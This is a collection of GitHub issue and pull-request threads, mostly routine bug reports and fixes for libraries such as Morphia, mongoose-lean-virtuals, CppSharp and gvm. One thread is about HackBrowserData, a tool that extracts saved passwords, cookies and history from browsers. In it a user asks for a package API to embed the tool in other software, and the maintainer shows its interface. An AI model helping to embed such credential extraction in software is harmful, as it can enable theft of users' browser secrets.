DEBUG rustls::client::tls13] Ticket saved [2023-02-16T00:42:56Z DEBUG h2::codec::framed_read] received frame=Settings { flags: (0x0), header_table_size: 4096, max_concurrent_streams: 100, initial_window_size: 1048576, enable_connect_protocol: 0 } [2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=Settings { flags: (0x1: ACK) } [2023-02-16T00:42:56Z DEBUG h2::codec::framed_read] received frame=WindowUpdate { stream_id: StreamId(0), size_increment: 983041 } [2023-02-16T00:42:56Z DEBUG h2::codec::framed_read] received frame=Settings { flags: (0x1: ACK) } [2023-02-16T00:42:56Z DEBUG h2::proto::settings] received settings ACK; applying Settings { flags: (0x0), enable_push: 0, initial_window_size: 2097152, max_frame_size: 16384 } [2023-02-16T00:42:56Z DEBUG h2::codec::framed_read] received frame=Headers { stream_id: StreamId(1), flags: (0x4: END_HEADERS) } [2023-02-16T00:42:56Z DEBUG h2::codec::framed_read] received frame=Data { stream_id: StreamId(1) } [2023-02-16T00:42:56Z DEBUG momento::preview::topics] received a heartbeat Here's what happens (--verbose) now on a subscription timeout regardless of whether something was published: [2023-02-16T00:45:12Z DEBUG momento::preview::topics] received a heartbeat [2023-02-16T00:46:12Z DEBUG h2::codec::framed_read] received frame=Reset { stream_id: StreamId(1), error_code: NO_ERROR } [2023-02-16T00:46:12Z DEBUG tonic::codec::decode] decoder inner stream error: Status { code: Unknown, message: "error reading a body from connection: stream error received: not a result of an error", source: Some(hyper::Error(Body, Error { kind: Reset(StreamId(1), NO_ERROR, Remote) })) } [2023-02-16T00:46:12Z DEBUG momento::response::error] translating raw status to error: Status { code: Unknown, message: "error reading a body from connection: stream error received: not a result of an error", source: Some(hyper::Error(Body, Error { kind: Reset(StreamId(1), NO_ERROR, Remote) })) } The subscription ended: the request was interrupted by the server without an error detail: TonicStatus(Status { code: Unknown, message: "error reading a body from connection: stream error received: not a result of an error", source: Some(hyper::Error(Body, Error { kind: Reset(StreamId(1), NO_ERROR, Remote) })) }) rebased for the restructure - it's a small enough pr I just force pushed.
2025-04-01T06:39:39.565222
2019-11-15T21:10:31
523689781
{ "authors": [ "LCCarmody" ], "license": "CC-BY-4.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8669", "repo": "monarch-initiative/MAxO", "url": "https://github.com/monarch-initiative/MAxO/issues/118" }
gharchive/issue
Corneal transplant term questions I am having difficulties finding specific definitions and differences in some of these terms. It seems to me that some of them have overlapping meaning or are synonymous, but I haven't found a resources that defines all of them. Corneal transplant corneal patch graft traditional, full thickness cornea transplant (also known as penetrating keratoplasty, or PK) back layer cornea transplant (also known as endothelial keratoplasty, or EK) Anterior lamellar keratoplasty (ALK) @pnrobinson Do you know the difference? Without more input or a use case, I'll just update a couple of synonyms and close.
2025-04-01T06:39:39.569310
2023-12-08T22:16:29
2033376709
{ "authors": [ "nicolevasilevsky", "sabrinatoro" ], "license": "CC-BY-4.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8670", "repo": "monarch-initiative/mondo", "url": "https://github.com/monarch-initiative/mondo/pull/7008" }
gharchive/pull-request
Add superclass to pregnancy loss, recurrent, 4 close #6867 @sabrina I'm not totally certain about this. This superclass makes sense per Megan's suggestion (based on what is in the OMIM description) but it seems to be weird to have a disease that is a susceptibility and a disease. But it does seem to make sense in this case. I wonder if maybe should remove the superclass 'fertility disorder'. Looks like I am the source and obviously, i am not an expert. @nicolevasilevsky I agree that it is weird, but we have other examples of terms that are both diseases and susceptibilities. What is weird here is the disease and the susceptibility are both for "pregnancy loss, recurrent". I would suggest that we keep both these parents (susceptibility and disease), and that we review this in the context of a branch review, when we talk to experts.
2025-04-01T06:39:39.570387
2023-11-27T18:40:18
2012874119
{ "authors": [ "caufieldjh", "hannahblau" ], "license": "BSD-3-Clause", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8671", "repo": "monarch-initiative/ontogpt-experiments", "url": "https://github.com/monarch-initiative/ontogpt-experiments/pull/4" }
gharchive/pull-request
new maxo annotation example This is a new maxo annotation example for PMID 31078652, in a new subfolder under cases called hannah_manual_annotations. Thanks @hannahblau
2025-04-01T06:39:39.655288
2018-02-11T03:58:22
296158104
{ "authors": [ "chekalskiy", "frederikbosch", "sagikazarmark" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8672", "repo": "moneyphp/money", "url": "https://github.com/moneyphp/money/pull/460" }
gharchive/pull-request
Fix floating point casting to integer in PHP calculator Fixes #455 @chekalskiy can you please check if this solves the issue for you? Yup, it did. I'll check a bit later. Thank you I've tested and now my test case looks fine. 👍 But shouldn't we add castString() to add(), subtract(), absolute() and mod() methods? No, as they don't involve casting float to string: add: adding two integers will result in an integer anyway subtract: subtracting one integer from another will result in an integer absolute: there is no calculation related to precision mod: there is no calculation related to precision But I've just found other places where the tests break. I added a new test case for running all tests with russian UTF8 locale for the php calculator. @frederikbosch see the separate commit with the breaking tests. Solution pushed in a separate commit. Merging this as it fixes the problem, but I'm going to do some refactoring around the number class. I feel that there is too many string casting here and there. Totally agree. In my perception, in version 4 we should use Number everwhere internally. That means only accepting Number or directly do the conversion on every numeric parameter.
2025-04-01T06:39:39.659077
2022-04-08T10:38:41
1197152589
{ "authors": [ "deby22", "florimondmanca", "mongkok" ], "license": "BSD-3-Clause", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8673", "repo": "mongkok/fastapi-debug-toolbar", "url": "https://github.com/mongkok/fastapi-debug-toolbar/issues/15" }
gharchive/issue
Ability to parse UUID https://github.com/mongkok/fastapi-debug-toolbar/blob/3552b0bbb8e1a86a4f5eaaf214e6916d52c941ef/debug_toolbar/panels/sql.py#L120-L121 Using UUID field raise an exception *** TypeError: Object of type UUID is not JSON serializable I suggest, adding UUID serialization, by cast to str if isinstance(obj, UUID): return str(obj) Or allow setting encoder on json.dumps method For anyone finding this issue, I bumped into the same situation and managed to find a workaround using FastAPI's jsonable_encoder: from debug_toolbar.panels.sqlalchemy import SQLAlchemyPanel as Base from fastapi.encoders import jsonable_encoder class SQLAlchemyPanel(Base): def after_execute(self, *args) -> None: # type: ignore # HACK: base SQL panel calls json.dumps(parameters) at some point. # Ensure values such as UUIDs can be dumped. parameters = args[3] args = (*args[:3], jsonable_encoder(parameters), *args[4:]) return super().after_execute(*args) It can then be used by passing panels=["path.to.panels.SQLAlchemyPanel"]. Hey @deby22 , issue is fixed using jsonable_encoder() as suggested by @florimondmanca , see #23 and v0.3.0.
2025-04-01T06:39:39.663396
2024-06-21T06:25:40
2365813168
{ "authors": [ "hasaketa", "mongodben" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8674", "repo": "mongodb/chatbot", "url": "https://github.com/mongodb/chatbot/issues/441" }
gharchive/issue
Does not work with latest models It does not produce response with text-embedding-3-small and gpt-4o combination can you provide more information about the error that you're getting so we can help debug? as a first step, you can try to lower the minScore in the FindContentFunc. the .9 that we have as a default in the quick start works well for ada-02 but is often too high for text-embedding-3-small. const findContent = makeDefaultFindContent({ embedder, store: embeddedContentStore, findNearestNeighborsOptions: { k: 5, path: "embedding", indexName: VECTOR_SEARCH_INDEX_NAME, // Start low to make sure all is working, and work your way up to a higher score if it's suiting. minScore: 0.1, }, }); Followed your suggestion to lower the minScore to 0.1 and that worked. Thank you!
2025-04-01T06:39:39.688208
2021-09-07T16:08:42
990139724
{ "authors": [ "gssbzn" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8675", "repo": "mongodb/mongocli", "url": "https://github.com/mongodb/mongocli/pull/826" }
gharchive/pull-request
test: remove tests for deprecated command Proposed changes Remove tests for deprecated command, this commands have been deprecated for a while and they are starting to flake so better to remove them Checklist [x] I have added tests that prove my fix is effective or that my feature works [x] I have added any necessary documentation (if appropriate) [x] I have updated e2e/E2E-TESTS.md (if a new command or e2e test has been added) [x] I have run make fmt and formatted my code is there an entry that needs to be removed/changed in E2e-TESTS.md as a result of this? good call, I deleted the entries as we don't even document these commands any more, we should plan some time to start deleting some of the deprecated stuff
2025-04-01T06:39:39.697223
2018-04-29T19:22:48
318742209
{ "authors": [ "Shad0wCore", "elwin013", "evanchooly" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8676", "repo": "mongodb/morphia", "url": "https://github.com/mongodb/morphia/issues/1244" }
gharchive/issue
Cannot insert a field with '.' ('dot') in field name Summary: Cannot insert any Map that contains e.g. mail (with dot) as a key. Tested on Morphia 1.3.2. Steps to reproduce: Create class containing map, e.g.: class MyObjectWithMap { Map<String, String> map = Maps.newHashMap(); } Try to save object: MyObjectWithMap obj = new MyObjectWithMap(); obj.map.put("keyOk", "OK"); getDs().save(obj); // Works well obj.map.put("key.notOK", "notOK"); getDs().save(obj); // Throws exception See result: java.lang.IllegalArgumentException: Invalid BSON field name key.notOK at org.bson.AbstractBsonWriter.writeName(AbstractBsonWriter.java:532) at com.mongodb.DBObjectCodec.encodeMap(DBObjectCodec.java:221) at com.mongodb.DBObjectCodec.writeValue(DBObjectCodec.java:198) at com.mongodb.DBObjectCodec.encode(DBObjectCodec.java:130) at com.mongodb.DBObjectCodec.encode(DBObjectCodec.java:61) at org.bson.codecs.BsonDocumentWrapperCodec.encode(BsonDocumentWrapperCodec.java:63) at org.bson.codecs.BsonDocumentWrapperCodec.encode(BsonDocumentWrapperCodec.java:29) at com.mongodb.operation.BulkWriteBatch$WriteRequestEncoder.encode(BulkWriteBatch.java:392) (... cut ...) Additional info: MongoDB docs ( https://docs.mongodb.com/manual/reference/limits/#Restrictions-on-Field-Names ) allows "." char. Also adding a document containing field with "." from Mongo shell works well. This is same problem to #827, but this time MongoDB (at least from 3.6) allows to use "." char in field names. Updates title and description to reflect reality - it is again about "." (dot) char... Run into the same issue right now. We've got 2018 and MongoDB nor Morphia is able to store a darn dot in the key. 💢👿 😡 This complaint is actually coming from the driver and not morphia. morphia just passes the name down to the driver which is rejecting the name. Consider filing a bug there. You might also try a new version fo the java driver and see if that behavior persists. @evanchooly You're right! Sorry for messing up and filling it here. Closing it and going to complain on Mongo bug tracker. ;-) For everybody running into same problem - there is an issue on Mongo tracker: https://jira.mongodb.org/browse/JAVA-2810
2025-04-01T06:39:39.699786
2012-01-09T10:18:27
2767038
{ "authors": [ "danielemilan", "durran" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8677", "repo": "mongoid/mongoid", "url": "https://github.com/mongoid/mongoid/issues/1568" }
gharchive/issue
Mongoid support for non-rack applications I'm using Mongoid in a non-rack application, and after updating to 2.4.0 I started receiving the error "Mongoid attempted to find the appropriate environment but no Rails.env, Sinatra::Base.environment, or RACK_ENV could be found" as soon as i load the configuration. Is Mongoid going to support only rack based applications? Sorry about that... Can you just use RACK_ENV for now and then I'll get this fixed for 2.4.1? How exactly are you determining what environment you are running under? I'm not determining it, I know it's a bare eventmachine ... the app is not running within any external environment, it's self contained.
2025-04-01T06:39:39.711945
2022-07-23T11:51:46
1315640699
{ "authors": [ "iammola", "vkarpov15" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8678", "repo": "mongoosejs/mongoose-lean-virtuals", "url": "https://github.com/mongoosejs/mongoose-lean-virtuals/issues/62" }
gharchive/issue
sub-document virtuals in nested arrays don't get attached when specified Do you want to request a feature or report a bug? Bug What is the current behaviour? The virtuals of sub-documents in nested arrays aren't attached to the result when I specify the virtual paths { virtuals: [...] }. It works fine when I lean the query with { virtuals: true } If the current behaviour is a bug, please provide the steps to reproduce. import mongoose from "mongoose"; import { mongooseLeanVirtuals } from "mongoose-lean-virtuals"; mongoose.plugin(mongooseLeanVirtuals); const NameSchema = new mongoose.Schema({ first: { type: String, required: true }, last: String, }); NameSchema.virtual("full").get(function () { return `${this.first} ${this.last ?? ""}`.trim(); }); const ChildSchema = new mongoose.Schema({ age: { type: Number, required: true }, name: { type: NameSchema, required: true }, }, { _id: false }); const ParentModel = mongoose.model( "Parent", new mongoose.Schema({ name: { type: NameSchema, required: true }, child: ChildSchema, nested: new mongoose.Schema({ children: [ChildSchema], }), }) ); async function run() { await mongoose.connect("..."); await ParentModel.create({ name: { first: "Homer", last: "Simpson" }, child: { age: 10, name: { first: "Bart", last: "Simpson" } }, nested: { children: [ { age: 6, name: { first: "Lisa", last: "Simpson" } }, { age: 3, name: { first: "Baby" } }, ], }, }); const result = await ParentModel.find({}) .populate("child") .populate("nested.children") .lean({ virtuals: ["name.full", "child.name.full", "children.name.full"], }); assert.equal(result.name.full, "Homer Simpson"); // Pass assert.equal(result.child.name.full, "Bart Simpson"); // Pass assert.equal(result.children[0].name.full, "Lisa Simpson"); // Fail assert.equal(result.children[1].name.full, "Baby"); // Fail } run().catch(console.error) What is the expected behaviour? For the virtuals of the sub-documents in nested arrays to be attached. What are the versions of Node.js, mongoose-lean-getters, and Mongoose are you are using? Note that "latest" is not a version. Package Version mongoose 6.4.3 mongoose-lean-getters N/A Node.js 18.6.0 You need to specify nested.children.name.full. The script you provided fails, but the below script works: const mongoose = require('mongoose'); const mongooseLeanVirtuals = require('mongoose-lean-virtuals'); const assert = require('assert'); mongoose.plugin(mongooseLeanVirtuals); const NameSchema = new mongoose.Schema({ first: { type: String, required: true }, last: String, }); NameSchema.virtual("full").get(function () { return `${this.first} ${this.last ?? ""}`.trim(); }); const ChildSchema = new mongoose.Schema({ age: { type: Number, required: true }, name: { type: NameSchema, required: true }, }, { _id: false }); const ParentModel = mongoose.model( "Parent", new mongoose.Schema({ name: { type: NameSchema, required: true }, child: ChildSchema, nested: new mongoose.Schema({ children: [ChildSchema], }), }) ); async function run() { await mongoose.connect("mongodb://localhost:27017/test"); await mongoose.connection.dropDatabase(); const { _id } = await ParentModel.create({ name: { first: "Homer", last: "Simpson" }, child: { age: 10, name: { first: "Bart", last: "Simpson" } }, nested: { children: [ { age: 6, name: { first: "Lisa", last: "Simpson" } }, { age: 3, name: { first: "Baby" } }, ], }, }); const result = await ParentModel.findById(_id) .populate("child") .populate("nested.children") .lean({ virtuals: ["name.full", "child.name.full", "nested.children.name.full"], // <-- note the 'nested.' }); assert.equal(result.name.full, "Homer Simpson"); // Pass assert.equal(result.child.name.full, "Bart Simpson"); // Pass assert.equal(result.nested.children[0].name.full, "Lisa Simpson"); // Pass assert.equal(result.nested.children[1].name.full, "Baby"); // Pass console.log('Done'); } run().catch(console.error) Also works fine if you remove the 'nested' Hey @vkarpov15, forgive my invalid script. I'll try to explain my actual use case and give an excuse for why my script had errors. I have a model with 2 discriminator schemas applied to it. The ParentModel.child and ParentModel.nested... was meant to show the field I'm trying to populate between them. They both point to the same model it just doesn't work with virtuals on the array of sub-documents. So I created a repro script to use here with populating the fields, and it didn't work. So I tried to check if it affected other schema definitions as well. That's why my original script has .populate("...") calls when the fields don't need it and the values aren't correctly checked. This is another script that I'm pretty sure will show my issue. Thanks again for your putting up with me and all your efforts across all the mongoose packages. import assert from "node:assert"; import mongoose from "mongoose"; import { mongooseLeanVirtuals } from "mongoose-lean-virtuals"; async function run() { mongoose.plugin(mongooseLeanVirtuals); await mongoose.connect("..."); const NameSchema = new mongoose.Schema({ first: { type: String, required: true }, last: String, }); NameSchema.virtual("full").get(function () { return `${this.first} ${this.last ?? ""}`.trim(); }); const ChildModel = mongoose.model( "Child", new mongoose.Schema({ age: { type: Number, required: true }, name: { type: NameSchema, required: true }, }) ); const ParentModel = mongoose.model( "Parent", new mongoose.Schema({ name: { type: NameSchema, required: true }, child: { type: mongoose.Types.ObjectId, ref: "Child" }, nested: { type: [new mongoose.Schema({ item: { type: mongoose.Types.ObjectId, ref: "Child" } })], }, }) ); const [child_1, child_2, child_3] = await ChildModel.create([ { age: 10, name: { first: "Bart", last: "Simpson" } }, { age: 6, name: { first: "Lisa", last: "Simpson" } }, { age: 3, name: { first: "Baby" } }, ]); await ParentModel.create({ name: { first: "Homer", last: "Simpson" }, child: child_1._id, nested: [{ item: child_3._id }, { item: child_2._id }], }); const result = await ParentModel.findOne({}) .populate("child") .populate("nested.item") .orFail(new Error("DOC!")) .lean({ virtuals: ["name.full", "child.name.full", "nested.item.name.full"] }); assert.equal(result.name.full, "Homer Simpson"); // Pass assert.equal(result.child?.name.full, "Bart Simpson"); // Pass assert.equal(result.nested[0].item?.name.full, "Baby"); // Fail assert.equal(result.nested[1].item?.name.full, "Lisa Simpson"); // Fail } run(); Also, did you mean to close #36? The PR you linked didn't have an effect because you used the Fix keyword on #37 We took a closer look and this proves to be tricky to implement in general with how Mongoose populate works. Without hooking more closely into Mongoose populate, handling cases like discriminators isn't really feasible. However, there is a simple workaround: const result = await ParentModel.findOne({}) .populate("child") .populate({ path: "nested.item", options: { lean: { virtuals: ['name.full'] } } }) // <-- add the `name.full` virtual here .orFail(new Error("DOC!")) .lean({ virtuals: ["name.full", "child.name.full"] }); // <-- instead of here
2025-04-01T06:39:39.719338
2022-05-14T23:30:58
1236142335
{ "authors": [ "monitoring-apps" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8680", "repo": "monitoring-apps/qc.app", "url": "https://github.com/monitoring-apps/qc.app/issues/72" }
gharchive/issue
⚠️ Quirk Club Argentina (API endpoint) has degraded performance In a8cb0e6, Quirk Club Argentina (API endpoint) (https://us-central1-quirkclub-dev.cloudfunctions.net/api/check/api) experienced degraded performance: HTTP code: 200 Response time: 7418 ms Resolved: Quirk Club Argentina (API endpoint) performance has improved in 62cf923.
2025-04-01T06:39:39.733664
2024-02-29T18:54:56
2161904450
{ "authors": [ "scala-steward" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8681", "repo": "monix/monix", "url": "https://github.com/monix/monix/pull/1817" }
gharchive/pull-request
Update silencer-plugin to 1.7.16 in series/4.x About this PR 📦 Updates com.github.ghik:silencer-plugin from 1.7.8 to 1.7.16 📜 GitHub Release Notes - Version Diff Usage ✅ Please merge! I'll automatically update this PR to resolve conflicts as long as you don't change it yourself. If you'd like to skip this version, you can just close this PR. If you have any feedback, just mention me in the comments below. Configure Scala Steward for your repository with a .scala-steward.conf file. Have a fantastic day writing Scala! ⚙ Adjust future updates Add this to your .scala-steward.conf file to ignore future updates of this dependency: updates.ignore = [ { groupId = "com.github.ghik", artifactId = "silencer-plugin" } ] Or, add this to slow down future updates of this dependency: dependencyOverrides = [{ pullRequests = { frequency = "30 days" }, dependency = { groupId = "com.github.ghik", artifactId = "silencer-plugin" } }] labels: library-update, early-semver-patch, semver-spec-patch, commit-count:1 Superseded by #1838.
2025-04-01T06:39:39.735774
2020-08-20T05:12:26
682416222
{ "authors": [ "kr-pawan", "xBATx" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8682", "repo": "monix/shade", "url": "https://github.com/monix/shade/issues/66" }
gharchive/issue
Usage with Scala version 2.13 When running with Scala 2.13 it turns up with java.lang.ClassNotFoundException: scala.Serializable using monix shade version "io.monix" % "shade_2.12" % "1.10.0". But works if we use with Scala version 2.12. Do we have a way to use with Scala 2.13 or this library to be compiled to 2.13? This'll add support for Scala 2.13 - https://github.com/monix/shade/pull/67
2025-04-01T06:39:39.746998
2019-11-06T16:04:44
518569918
{ "authors": [ "polar", "tritao" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8683", "repo": "mono/CppSharp", "url": "https://github.com/mono/CppSharp/issues/1260" }
gharchive/issue
Problem generating correct Entrypoint for method. I'm using templates on Linux, using the CLI.exe to generate C# and the correct -Symbols.cpp files. I added the following to the CppCharp.Generator#Setup(Driver) method: driver.Options.GenerateClassTemplates = true; My simple class: #include <string> class Example { public: Example() {}; void print(std::string &x); }; I use the following command: mono --debug ~/src/CppSharp/build/gmake/lib/Release_x64/CppSharp.CLI.exe -ax64 -o=build/cppsharp Example.hpp Example.cpp This problem is that the following lines get generated in the cppsharp.cs file: [SuppressUnmanagedCodeSecurity] [DllImport("cppsharp", CallingConvention = global::System.Runtime.InteropServices.CallingConvention.Cdecl, EntryPoint="_ZN7Example5printERSs")] internal static extern void print(global::System.IntPtr __instance, global::System.IntPtr x); The actual entry point to this function in the libcppsharp.so file is _ZN7Example5printERNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE. Changing the _ZN7Example5printERSs in the cppsharp.cs file to the above value rectifies this problem. Is there a way to get this entry point to generate correctly? @ddobrev Any idea about this? I imagine finding the mangled name has to be done by types somewhere. I imagine "RSs" meaning "Reference to Standard string", but as @ddobrev mentioned, std::string is defined as std::basic_string<char, std::allocator<char>> on all platforms. I added another `std::string`` parameter: print(std::string &x, std::string &y); and corresponding mangled names are: _ZN7Example5printERSsS0_ and the correct one is: _ZN7Example5printERNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES6_ . @polar If you run nm on the native library, does _ZN7Example5printERSsS0_ show up as a symbol? No, it does not. 0000000000000e11 T Example_Example 0000000000000e65 T Example__Example 0000000000000e3e T Example_Example___1__S_Example 0000000000000daa T _ZN7Example5printERNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES6_ 0000000000000f20 W _ZN7ExampleaSEOS_ 0000000000000f0e W _ZN7ExampleaSERKS_ 0000000000000f02 W _ZN7ExampleC1Ev 0000000000000f02 W _ZN7ExampleC2Ev I don't really know why. It seems that std::string is supposed to mangle to "Ss". Maybe I have a bad option in compiling these? I have compiled Example.cpp with c++, g++, and clang++ with absolutely no options, and I get the same complicated mangled name for print. Never mind. I needed "--c++11" in the flags, which got the proper ABI configured for the parser.
2025-04-01T06:39:39.750557
2020-02-11T17:56:10
563377984
{ "authors": [ "BenMcLean", "andreasbrostencab", "mscherotter" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8684", "repo": "mono/SkiaSharp", "url": "https://github.com/mono/SkiaSharp/issues/1139" }
gharchive/issue
[FEATURE] Adding metadata properties to JPEG images when using SKPixmap.Encode() Is your feature request related to a problem? Please describe. JPEG images and other image file types can have additional metadata properties that can enhance how the picture is interpreted by renderers. An example is the "/xmp/{wstr=http://ns.google.com/photos/1.0/panorama/}:ProjectionType" = "equirectangular" property which identifies an image as a 360 panoramic projection image. You can easily use the exiftool app https://exiftool.org/gui/ to add the metadata but I need to add it in the code of my app. Describe the solution you'd like Add a dictionary property to SKJpegEncoderOptions to enable setting metadata properties when encoding JPEG images. Describe alternatives you've considered None known. Additional context Any thoughts around this? PNG format has metadata as well which should be writable.
2025-04-01T06:39:39.794542
2015-09-26T05:26:40
108441641
{ "authors": [ "monstrenyatko" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8685", "repo": "monstrenyatko/butler-xbee-gateway", "url": "https://github.com/monstrenyatko/butler-xbee-gateway/issues/10" }
gharchive/issue
Unexpected start of next frame Connection between XBee client and TCP server is not stable. Before TCP connection drop The warning "unexpected start of next frame" is printed. Byte processing is fixed. End of the frame will not be missed anymore.
2025-04-01T06:39:39.798054
2015-09-10T17:59:25
105864000
{ "authors": [ "carloscallahuayapa", "dpaloucva", "hitteshahuja", "jleyva" ], "license": "apache-2.0", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8686", "repo": "moodlehq/moodlemobile2", "url": "https://github.com/moodlehq/moodlemobile2/issues/217" }
gharchive/issue
ReferenceError cordova is not defined Tried to follow instrutctions given here : https://docs.moodle.org/dev/Setting_up_your_development_environment_for_Moodle_Mobile_2 but i keep getting "cordova is not defined" when trying to connect to moodle. Hi, we've identified this error and we've opened an issue to fix it: https://tracker.moodle.org/browse/MOBILE-1219 Thanks, Dani Hello, I Tried to follow instrutctions, but I have this problem, please help me. Thanks :) Closing this issue, please follow-up in the tracker
2025-04-01T06:39:39.815619
2020-07-17T20:33:54
659615570
{ "authors": [ "Dontmindmes", "moonD4rk" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8687", "repo": "moonD4rk/HackBrowserData", "url": "https://github.com/moonD4rk/HackBrowserData/issues/18" }
gharchive/issue
Package implement? Hey could you implement a package system so we can use this program in our software? chrome, err := Recovery(browser, "text.json", history,password,cookie) ok, I would add this feature today or tomorrow. Thank you, would it be possible to make it so you can choose only windows function so build is smaller? @Dontmindmes compiling for windows only seems impossible! And this tool is best used as a command-line tool. I've added two new interface structs. The functions in these two interfaces will hopefully help you to use them in your own projects. type Browser interface { InitSecretKey() error GetName() string GetSecretKey() []byte GetAllItems(itemName string) ([]common.Item, error) } type Item interface { ChromeParse(key []byte) error FirefoxParse() error OutPut(format, browser, dir string) error CopyItem() error Release() error }
2025-04-01T06:39:39.862515
2017-07-19T20:16:13
244160864
{ "authors": [ "moorepants" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8689", "repo": "moorepants/resonance", "url": "https://github.com/moorepants/resonance/issues/1" }
gharchive/issue
Project name Some words to play with: learning education resonance engineering computation frequency vibration oscillation damping natrual frequency phase shift degree of freedom mass spring damper mode shape mode eigen* stability Going with resonance.
2025-04-01T06:39:39.868556
2023-11-13T19:58:18
1991380358
{ "authors": [ "adamdecaf", "codecov-commenter" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8691", "repo": "moov-io/watchman", "url": "https://github.com/moov-io/watchman/pull/511" }
gharchive/pull-request
Reduce Jaro term proximity We can roughly assume terms should match within a few positions relative to each other. Queries should contain as many terms as possible and ideally would have rough ordering similar to indexed terms. Codecov Report Merging #511 (53d1fd2) into master (766a672) will decrease coverage by 0.01%. Report is 1 commits behind head on master. The diff coverage is 0.00%. :exclamation: Current head 53d1fd2 differs from pull request most recent head 489fc9e. Consider uploading reports for the commit 489fc9e to get more accurate results :exclamation: Your organization needs to install the Codecov GitHub app to enable full functionality. Additional details and impacted files @@ Coverage Diff @@ ## master #511 +/- ## ========================================= - Coverage 8.27% 8.26% -0.01% ========================================= Files 44 44 Lines 3492 3496 +4 ========================================= Hits 289 289 - Misses 3180 3184 +4 Partials 23 23
2025-04-01T06:39:39.874027
2021-05-29T01:12:28
906272781
{ "authors": [ "jeremy-ebler-vineti" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8692", "repo": "moovweb/gvm", "url": "https://github.com/moovweb/gvm/pull/380" }
gharchive/pull-request
Support macOS 11 Big Sur Binary Downloads There was some compatibility code for Golang versions less than 1.4.3 that broke installs on Big Sur. Prior to 1.4.3, there were two versions for osx10.8 and osx10.6. 1.4.3 introduced a unified amd64 version. When OS X changed the major version from 10 to 11, that logic broke. This patch moves that compatibility logic into the "less than 1.4.3" check, and now checks both the major and minor version of macOS. I tried a different patch that would download go1.4.2.darwin-amd64-osx10.8.pkg on Big Sur, and it installed successfully, but go version printed a stack trace, so I adjusted the patch to print Binary Go unavailable for this platform. I tested, go1.4.2 and it installs, but also crashes. go1.5 installed and passed my go version test. We could write more code to protect Big Sur users from this, but I doubt many developers are still trying to use a Golang from 2015 on Big Sur, and I don't think my go version test is a comprehensive compatibility test anyways. PS: I included a whitespace-only commit, as a few lines used spaces for indentation while the overwhelming majority of the file used tabs. I just noticed that https://github.com/moovweb/gvm/pull/364 is largely the same patch. Moving the macOS specific checks into the 1.4.x check is slightly better (since they only matter if that check passes), but it's a very minor optimization.
2025-04-01T06:39:39.886421
2016-01-26T14:17:59
128832238
{ "authors": [ "hoangphuongcs", "jodal" ], "license": "apache-2.0", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8693", "repo": "mopidy/pyspotify", "url": "https://github.com/mopidy/pyspotify/issues/181" }
gharchive/issue
get toplist not working, len of list is empty toplist = self.session.get_toplist(type=spotify.ToplistType.TRACKS, region='US') toplist.load() print len(toplist.tracks) -> 0 print len(toplist.artists) -> 0 Tell me how to fix this issue? thanks! Toplists seems to work as expected: In [1]: import spotify In [2]: session = spotify.Session() In [3]: session.login('user', 'secret') In [4]: loop = spotify.EventLoop(session) In [5]: loop.start() In [6]: toplist = session.get_toplist(type=spotify.ToplistType.TRACKS, region='US') In [7]: toplist.load() Out[7]: Toplist(type=<ToplistType.TRACKS: 2>, region='US', canonical_username=None) In [8]: len(toplist.tracks) Out[8]: 100 In [9]: len(toplist.artists) Out[9]: 0 Closing, as I assume you haven't been waiting for a solution for 3.5y.
2025-04-01T06:39:39.996527
2017-10-21T19:21:06
267406894
{ "authors": [ "courtox", "emmiep", "redhatjobin" ], "license": "apache-2.0", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8694", "repo": "mortenjust/androidtool-mac", "url": "https://github.com/mortenjust/androidtool-mac/issues/134" }
gharchive/issue
